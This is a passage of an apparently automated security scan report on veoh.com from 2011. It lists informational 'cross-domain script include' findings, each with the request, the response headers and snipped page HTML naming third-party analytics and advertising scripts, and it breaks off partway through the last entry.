<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769625"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.463. http://www.veoh.com/support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /support.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support.html HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 24001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.464. http://www.veoh.com/users/JDFox5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/JDFox5

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/JDFox5 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 33281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769621"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.465. http://www.veoh.com/users/MitchRider  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/MitchRider

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/MitchRider HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:00 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 35062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769620"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.466. http://www.veoh.com/users/Veoh-Action-Anime  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/Veoh-Action-Anime

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/Veoh-Action-Anime HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 33392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769611"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.467. http://www.veoh.com/users/Veoh-Horror-Movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/Veoh-Horror-Movies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/Veoh-Horror-Movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=91
Content-Length: 32667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769612"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.468. http://www.veoh.com/users/Veoh-Upcoming-Movies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/Veoh-Upcoming-Movies

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/Veoh-Upcoming-Movies HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:05 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=44
Content-Length: 31732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769625"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.469. http://www.veoh.com/users/bunny12344  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/bunny12344

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/bunny12344 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:02 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=52
Content-Length: 43006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769623"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.470. http://www.veoh.com/users/tonysurfs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /users/tonysurfs

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /users/tonysurfs HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=1
Content-Length: 33325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</h3>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769613"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.471. http://www.veoh.com/veohtv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /veohtv

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /veohtv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=67
Content-Length: 26797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.472. http://www.veoh.com/video/conduit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/conduit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/conduit HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 29374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.473. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /video/flag/permalinkId/v18978294NGnK88j8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/flag/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
